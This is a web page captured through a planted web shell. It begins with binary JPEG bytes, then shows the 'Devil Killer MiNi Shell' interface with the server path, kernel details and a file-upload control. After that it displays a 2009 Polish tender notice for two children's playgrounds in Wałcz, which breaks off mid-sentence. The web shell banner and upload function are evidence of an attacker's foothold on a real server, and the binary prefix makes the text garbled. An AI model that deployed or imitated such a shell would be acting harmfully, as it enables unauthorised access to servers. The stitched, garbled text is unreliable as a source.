JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090901/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090901/299634-N-2009.html

<p class="kh_header"><b>Wałcz: Wykonanie placów zabaw przy budynku ul. Kościuszki 13 oraz przy budynku ul. Dolne Miasto 15 w Wałczu</b><br>
<b>Numer ogłoszenia: 299634 - 2009; data zamieszczenia: 01.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wałecka Spółdzielnia Mieszkaniowa Lokatorsko-Własnościowa w Wałczu , ul. Wojska Polskiego 2-6, 78-600 Wałcz, woj. zachodniopomorskie, tel. 067 2580265, faks 067 2500695.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wsm.walcz.p.r.v.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółdzielnia Mieszkaniowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie placów zabaw przy budynku ul. Kościuszki 13 oraz przy budynku ul. Dolne Miasto 15 w Wałczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i wyposażenie dwóch placów zabaw :
1.	przy ul. Kościuszki - pomiędzy budynkami 1-11, 13, 15, 17,
2.	przy ul. Dolne Miasto - pomiędzy budynkami 15, 17, 18, 19.
Każdy z placów zabaw stanowi odrębną część zamówienia.
Wykonawca może złożyć ofertę na jedną lub dwie części pod warunkiem, że oferta będzie obejmowała pełny zakres prac i wyposażenia danej części.
Ad. 1. Zakres rzeczowy przedmiotu zamówienia placu zabaw przy ul. Kościuszki - pomiędzy budynkami 1-11, 13, 15, 17.
Na działce nr 5614/5 o powierzchni ok. 700 m2 należy wykonać plac zabaw dla dzieci. 
Planuje się:
- rozbiórkę części istniejących utwardzeń kolidujących z projektowanymi elementami,
- montaż urządzeń zabawowych,
- montaż ławek,
- wykonanie nowych utwardzeń (chodników),
- wykonanie nawierzchni z piasku na placu zabaw,
- renowacja trawników w sąsiedztwie placu zabaw.
Wyposażenie placu zabaw w urządzenia zabawowe dla dzieci wg ilości, rodzaju i
rozmieszczenie wg projektu zagospodarowania terenu.
Urządzenia mają być wykonane z drewna klejonego warstwowo, malowanego środkami ochronnymi i dwukrotnie lakierowanego.
Urządzenia osadzone w fundamencie betonowym za pomocą stalowych,
ocynkowanych kotew. Wszystkie łańcuchy oraz konstrukcyjne elementy metalowe wykonane ze stali ocynkowanej kąpielowo oraz odpowiednio kalibrowane.
W linariach zastosować liny z rdzeniem stalowym, łączone elementami
ozdobnymi o sprawdzonej wytrzymałości i zakończone aluminiową kauszą.
Elementy metalowe uchwytów, rurek i poręczy wykonane ze stali ocynkowanej
kąpielowo i pomalowanej proszkowo ze względów estetycznych.
Drewno należy zabezpieczyć przed wilgocią wykorzystując ozdobne osłony z tworzyw sztucznych o wysokiej wytrzymałości. Elementy metalowe np. łańcuchy, zawiesia ze stali nierdzewnej, malowane proszkowo.
Na placu należy zamontować 5 sztuk ławek miejskich z oparciem.
Konstrukcja ławki z metalu, stopy montowane do podłoża za pomocą śrub
rozporowych, siedzisko i oparcie z desek świerkowych impregnowanych i
malowanych.
Plac zabaw należy wyposażyć w tablicę na regulamin placu zabaw ustawioną przy wejściu.
Urządzenia zabawowe wykonane w technologii drewna okrągłego impregnowanego ciśnieniowo, z wykorzystaniem sklejki laminowanej oraz metalu lub konstrukcji stalowych. Wszystkie produkty musza posiadać certyfikaty zgodności z normami 
PN-EN 1176 (Wyposażenie placów zabaw) i PN - EN 1177 (Nawierzchnie placów zabaw amortyzujące upadki. Wymagania bezpieczeństwa i metody badań.)
Każde z montowanych urządzeń musi posiadać certyfikat bezpieczeństwa.

Ad. 2. Zakres rzeczowy przedmiotu zamówienia placu zabaw przy ul. Dolne Miasto - pomiędzy budynkami 15, 17, 18, 19.
W części południowej działki nr 5615/12 na powierzchni ok. 2570m2 wykonać
plac zabaw dla dzieci. Przeznaczenie terenu, który dotąd służył rekreacji nie ulegnie
zmianie. Wzdłuż wschodniej granicy działki należy wykonanie utwardzenia z kostki
betonowej o wymiarach 15,0x14,0m oraz montaż tablicy do gry w koszykówkę.
Na działce planuje się także:
- montaż urządzeń zabawowych,
- montaż ławek,
- wykonanie nowych utwardzeń (chodników),
- wykonanie nawierzchni z piasku na placu zabaw,
- renowacja trawników w sąsiedztwie placu zabaw.
Teren pod planowany plac zabaw należy zniwelować, nawierzchnie utwardzone (plac do gry w koszykówkę) wykonać z kostki betonowej gr. 8cm na podsypce piaskowo-cementowej 1:4 gr. 4cm. Podsypkę piaskowo-cementową wykonać na zagęszczonej podsypce piaskowej gr. 15cm. Wokół nawierzchni wykonać obrzeża betonowe 8x30cm na podsypce piaskowej z wypełnieniem spoin piaskiem.
Nawierzchnię placu zabaw wykonać z piasku gr. 30cm, najlepiej płukanego o frakcji od 0,2-2mm, bez zawartości części pylastych i iłów.
Projektowane chodniki wykonać z kostki betonowej gr. 6cm na zagęszczonej
podsypce piaskowej gr. 10cm. Obrzeża betonowe 8x30cm na podsypce
piaskowej z wypełnieniem spoin piaskiem.
Po zamontowaniu urządzeń i wykonaniu utwardzeń zasiać trawę. Wykonać
nasadzenia drzew i krzewów (wg projektu zagospodarowania terenu).
Na placu zabaw montaż urządzeń zabawowych dla dzieci - Ilość, rodzaj i
rozmieszczenie urządzeń należy wykonać wg projektu zagospodarowania terenu.
Na placu utwardzonym zamontować tablicę do gry w koszykówkę wykonaną z kratownicy obramowanej profilem stalowym mocowaną do statywu z rury stalowej, obręcz z pręta stalowego, siatka z łańcuszka. Statyw zakotwiony w betonowym fundamencie. Wszystkie elementy stalowe ocynkowane ogniowo.
Urządzenia zabawowe wykonane z drewna klejonego warstwowo,
malowanego środkami ochronnymi i dwukrotnie lakierowanego.
Urządzenia osadzić w fundamencie betonowym za pomocą stalowych,
ocynkowanych kotew, co w pełni ochroni drewno przed szkodliwym wpływem
wilgoci z gruntu. Wszystkie łańcuchy oraz konstrukcyjne elementy metalowe mają być wykonane ze stali ocynkowanej kąpielowo oraz odpowiednio kalibrowane.
W linariach zastosować liny z rdzeniem stalowym, łączone elementami
ozdobnymi o sprawdzonej wytrzymałości i zakończone aluminiową kauszą.
Elementy metalowe uchwytów, rurek i poręczy mają być wykonane ze stali ocynkowanej kąpielowo i pomalowanej proszkowo ze względów estetycznych.
Drewno zabezpieczyć przed wilgocią wykorzystując ozdobne osłony z tworzyw
sztucznych o wysokiej wytrzymałości. Elementy metalowe np. łańcuchy, zawiesia ze stali nierdzewnej, malowane proszkowo.
Na placu zabaw zamontować 6 sztuk ławek miejskich z oparciem oraz 2 sztuk ławek bez oparcia (w sąsiedztwie placu do gry w koszykówkę).
Konstrukcja ławki z metalu : stopy montowane do podłoża za pomocą śrub
rozporowych, siedzisko i oparcie z desek świerkowych impregnowanych i
malowanych.
Plac zabaw należy wyposażyć w tablicę na regulamin placu zabaw ustawioną przy wejściu.
Urządzenia zabawowe wykonane w technologii drewna okrągłego impregnowanego ciśnieniowo, z wykorzystaniem sklejki laminowanej oraz metalu lub konstrukcji stalowych. Wszystkie produkty musza posiadać certyfikaty zgodności z normami 
PN-EN 1176 (Wyposażenie placów zabaw) i PN - EN 1177 (Nawierzchnie placów zabaw amortyzujące upadki. Wymagania bezpieczeństwa i metody badań.)
Każde z montowanych urządzeń musi posiadać certyfikat bezpieczeństwa..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9, 45.11.12.91-4, 45.23.31.61-5, 43.32.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wysokość wadium na całość zamówienia ustala się w kwocie 4.200 złotych
słownie : cztery tysiące dwieście złotych.
Na poszczególne części następująco :
Część 1 - przy ul. Kościuszki - pomiędzy budynkami 1-11, 13, 15, 17 - wadium w kwocie 1.200 zł
Część 2 - przy ul. Dolne Miasto - pomiędzy budynkami 15, 17, 18, 19 - wadium w kwocie 3.000 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą brać udział Wykonawcy, którzy:      
1)	posiadają uprawnienie do Wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień i są uprawnieni do działalności zgodnie z art. 14 ust. 1 ustawy z dnia 02 lipca 2004 r. o swobodzie działalności gospodarczej (Dz. U. z 2007 r. Nr 155 poz. 1095);
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia i w tym względzie wykażą się dowodami, że:
a)	wykażą i udokumentują ( referencje lub opinie lub listy polecające ) w okresie ostatnich 5 lat przed wszczęciem postępowania ( VIII.2004 - VIII.2009 ), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres wykonanie robót budowlanych odpowiadających swoim rodzajem przedmiotowi zamówienia ( przez co należy rozumieć roboty związane z zagospodarowaniem terenu, a w tym przynajmniej jedna robota związana z budową placu zabaw dla dzieci ) o wartości min. 100.000 zł każda,
b)	dysponują osobami zdolnymi do wykonania zamówienia tj. kierownik budowy z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie w specjalności konstrukcyjno - budowlanej,  personelem posiadającym kwalifikacje w zakresie robót ogólnobudowlanych, brukarskich.  Kierownik budowy musi posiadać stwierdzenia przygotowania zawodowego do wykonywania samodzielnych funkcji w budownictwie oraz wpis na listę właściwej Okręgowej Izby Samorządu Zawodowego;
c)	oświadczą, że dysponują lub będą dysponować niezbędnym sprzętem technicznym i narzędziami do wykonania zadania;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia oraz posiadają ubezpieczoną OC z tytułu prowadzonej działalności gospodarczej i w tym względzie wykażą, że :1.dla zabezpieczenia bieżącego wykonywania robót posiadają środki własne lub dostęp do kredytu w wysokości min. ceny ofertowej, 2. posiadają polisę ubezpieczenia OC z tytułu prowadzenia działalności gospodarczej ;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ust. 1 i 2 ustawy Pzp. ;
5)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że:
a)	każdy z osobna - posiadają uprawnienia do działalności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień oraz nie podlegają wykluczeniu na podstawie art. 24 ustawy Pzp; 
b)	wspólnie muszą wykazać, że posiadają wiedzę i doświadczenie, dysponują potencjałem technicznym, dysponują osobami zdolnymi do wykonania zamówienia, posiadają odpowiednie środki finansowe do wykonania zamówienia, posiadają ubezpieczoną OC z tytułu działalności gospodarczej.


2. Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu.
Ocena spełniania warunku dokonana będzie na podstawie załączonych przez wykonawcę do oferty oświadczeń i dokumentów, z treści których wynikać będą informacje potwierdzające spełnianie warunków. Oświadczenia woli muszą być złożone w oryginale i podpisane przez osobę do tego uprawnioną. Kopie dokumentów muszą być potwierdzone - za zgodność z oryginałem - przez osobę do tego uprawnioną.
Pełnomocnictwo dla osób lub podmiotów uprawnionych do reprezentacji albo do reprezentacji i zawarcia umowy musi być złożone w oryginale lub kopii potwierdzonej przez notariusza. Pełnomocnictwo w formie pełnomocnictwa rodzajowego powinno dotyczyć przedmiotowego postępowania i zamawiającego. Z treści pełnomocnictwa powinien wynikać zakres umocowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art. 22 ust. 1 pkt 1 - 3 ustawy Pzp (jeżeli oferta jest składana wspólnie przez kilka podmiotów, oświadczenie niniejsze powinno być złożone jako jedno i podpisane przez wszystkich partnerów lub ich pełnomocnika). 
2. Oświadczenie o niepodleganiu wykluczeniu w zakresie art. 24 ust. 1 ustawy Pzp (jeżeli oferta jest składana wspólnie przez kilka podmiotów, oświadczenie niniejsze powinno być złożone osobno przez każdego z partnerów). 
3. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności i czynności, jeżeli ustawy to przewidują, do oferty należy dołączyć następujące dokumenty: 
1)	aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
2)	pełnomocnictwa osób uprawnionych do składania oświadczeń woli i do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. 
4. W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę oraz doświadczenie,  dysponuje potencjałem technicznym, a także osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty: 
1)	oświadczenie o dysponowaniu niezbędnym sprzętem do wykonania zamówienia lub pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia narzędzi i urządzeń;
2)	wykaz wykonanych w okresie ostatnich pięciu lat od wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, robót odpowiadających przedmiotowi zamówienia, z podaniem wartości, nazwy przedmiotu, dat wykonania i odbiorców wraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie;
3)	wykaz osób lub pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia oraz uprawnieniami i zaświadczeniami o wpisie na listę właściwej Okręgowej Izby Samorządu Zawodowego;
4)	oświadczenie o części zamówienia, którą Wykonawca zamierza powierzyć podwykonawcy wraz z określeniem zakresu rzeczowego w realizacji zadania, w przeciwnym wypadku oświadczenie, że Wykonawca wykona zamówienie samodzielnie bez zlecenia jakichkolwiek czynności podwykonawcy. 
5. W celu potwierdzenia, że Wykonawca znajduje się w sytuacji finansowej gwarantującej wykonanie zamówienia do oferty należy załączyć następujące dokumenty: 
1)	informacja banku lub SKOK, w którym wykonawca posiada rachunek bankowy, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
6. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty zgodnie z przepisami rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605 i z 2008 r. Dz.U. Nr 188 poz. 1155).
7. Wykonawcy wspólnie ubiegający się o zamówienie zobowiązani są ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
8. Forma dokumentów i oświadczeń:
1)	dokumenty i oświadczenia dołączone do oferty mają być w formie oryginałów lub kserokopii;
2)	w przypadku dokumentów lub oświadczeń sporządzonych w językach obcych należy dołączyć tłumaczenie na język polski podpisane przez Wykonawcę.

Kopie dokumentów muszą być potwierdzone za zgodność z oryginałem przez Wykonawcę lub przez osobę posiadającą odpowiednie pełnomocnictwo..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> Korzysta się ze strony internetowej Miasta Wałcza : www.um.walcz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wałecka Spółdzielnia Mieszkaniowa
Lokatorsko - Własnościowa
ul. Wojska Polskiego 2 - 6
78 - 600 Wałcz
u p. Eugeniusza Pieróg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2009 godzina 10:00, miejsce: Sekretariat Wałeckiej Spółdzielni Mieszkaniowej Lokatorsko - Własnościowej
ul. Wojska Polskiego 2 - 6
78 - 600 Wałcz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie i wyposażenie placu zabaw przy ul. Kościuszki - pomiędzy budynkami 1-11, 13, 15, 17,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy przedmiotu zamówienia placu zabaw przy ul. Kościuszki - pomiędzy budynkami 1-11, 13, 15, 17.
Na działce nr 5614/5 o powierzchni ok. 700 m2 należy wykonać plac zabaw dla dzieci. 
Planuje się:
- rozbiórkę części istniejących utwardzeń kolidujących z projektowanymi elementami,
- montaż urządzeń zabawowych,
- montaż ławek,
- wykonanie nowych utwardzeń (chodników),
- wykonanie nawierzchni z piasku na placu zabaw,
- renowacja trawników w sąsiedztwie placu zabaw.
Wyposażenie placu zabaw w urządzenia zabawowe dla dzieci wg ilości, rodzaju i
rozmieszczenie wg projektu zagospodarowania terenu.
Urządzenia mają być wykonane z drewna klejonego warstwowo, malowanego środkami ochronnymi i dwukrotnie lakierowanego.
Urządzenia osadzone w fundamencie betonowym za pomocą stalowych,
ocynkowanych kotew. Wszystkie łańcuchy oraz konstrukcyjne elementy metalowe wykonane ze stali ocynkowanej kąpielowo oraz odpowiednio kalibrowane.
W linariach zastosować liny z rdzeniem stalowym, łączone elementami
ozdobnymi o sprawdzonej wytrzymałości i zakończone aluminiową kauszą.
Elementy metalowe uchwytów, rurek i poręczy wykonane ze stali ocynkowanej
kąpielowo i pomalowanej proszkowo ze względów estetycznych.
Drewno należy zabezpieczyć przed wilgocią wykorzystując ozdobne osłony z tworzyw sztucznych o wysokiej wytrzymałości. Elementy metalowe np. łańcuchy, zawiesia ze stali nierdzewnej, malowane proszkowo.
Na placu należy zamontować 5 sztuk ławek miejskich z oparciem.
Konstrukcja ławki z metalu, stopy montowane do podłoża za pomocą śrub
rozporowych, siedzisko i oparcie z desek świerkowych impregnowanych i
malowanych.
Plac zabaw należy wyposażyć w tablicę na regulamin placu zabaw ustawioną przy wejściu.
Urządzenia zabawowe wykonane w technologii drewna okrągłego impregnowanego ciśnieniowo, z wykorzystaniem sklejki laminowanej oraz metalu lub konstrukcji stalowych. Wszystkie produkty musza posiadać certyfikaty zgodności z normami 
PN-EN 1176 (Wyposażenie placów zabaw) i PN - EN 1177 (Nawierzchnie placów zabaw amortyzujące upadki. Wymagania bezpieczeństwa i metody badań.)
Każde z montowanych urządzeń musi posiadać certyfikat bezpieczeństwa..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie i wyposażenie placu zabaw przy ul. Dolne Miasto - pomiędzy budynkami 15, 17, 18, 19..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy przedmiotu zamówienia placu zabaw przy ul. Dolne Miasto - pomiędzy budynkami 15, 17, 18, 19.
W części południowej działki nr 5615/12 na powierzchni ok. 2570m2 wykonać
plac zabaw dla dzieci. Przeznaczenie terenu, który dotąd służył rekreacji nie ulegnie
zmianie. Wzdłuż wschodniej granicy działki należy wykonanie utwardzenia z kostki
betonowej o wymiarach 15,0x14,0m oraz montaż tablicy do gry w koszykówkę.
Na działce planuje się także:
- montaż urządzeń zabawowych,
- montaż ławek,
- wykonanie nowych utwardzeń (chodników),
- wykonanie nawierzchni z piasku na placu zabaw,
- renowacja trawników w sąsiedztwie placu zabaw.
Teren pod planowany plac zabaw należy zniwelować, nawierzchnie utwardzone (plac do gry w koszykówkę) wykonać z kostki betonowej gr. 8cm na podsypce piaskowo-cementowej 1:4 gr. 4cm. Podsypkę piaskowo-cementową wykonać na zagęszczonej podsypce piaskowej gr. 15cm. Wokół nawierzchni wykonać obrzeża betonowe 8x30cm na podsypce piaskowej z wypełnieniem spoin piaskiem.
Nawierzchnię placu zabaw wykonać z piasku gr. 30cm, najlepiej płukanego o frakcji od 0,2-2mm, bez zawartości części pylastych i iłów.
Projektowane chodniki wykonać z kostki betonowej gr. 6cm na zagęszczonej
podsypce piaskowej gr. 10cm. Obrzeża betonowe 8x30cm na podsypce
piaskowej z wypełnieniem spoin piaskiem.
Po zamontowaniu urządzeń i wykonaniu utwardzeń zasiać trawę. Wykonać
nasadzenia drzew i krzewów (wg projektu zagospodarowania terenu).
Na placu zabaw montaż urządzeń zabawowych dla dzieci - Ilość, rodzaj i
rozmieszczenie urządzeń należy wykonać wg projektu zagospodarowania terenu.
Na placu utwardzonym zamontować tablicę do gry w koszykówkę wykonaną z kratownicy obramowanej profilem stalowym mocowaną do statywu z rury stalowej, obręcz z pręta stalowego, siatka z łańcuszka. Statyw zakotwiony w betonowym fundamencie. Wszystkie elementy stalowe ocynkowane ogniowo.
Urządzenia zabawowe wykonane z drewna klejonego warstwowo,
malowanego środkami ochronnymi i dwukrotnie lakierowanego.
Urządzenia osadzić w fundamencie betonowym za pomocą stalowych,
ocynkowanych kotew, co w pełni ochroni drewno przed szkodliwym wpływem
wilgoci z gruntu. Wszystkie łańcuchy oraz konstrukcyjne elementy metalowe mają być wykonane ze stali ocynkowanej kąpielowo oraz odpowiednio kalibrowane.
W linariach zastosować liny z rdzeniem stalowym, łączone elementami
ozdobnymi o sprawdzonej wytrzymałości i zakończone aluminiową kauszą.
Elementy metalowe uchwytów, rurek i poręczy mają być wykonane ze stali ocynkowanej kąpielowo i pomalowanej proszkowo ze względów estetycznych.
Drewno zabezpieczyć przed wilgocią wykorzystując ozdobne osłony z tworzyw
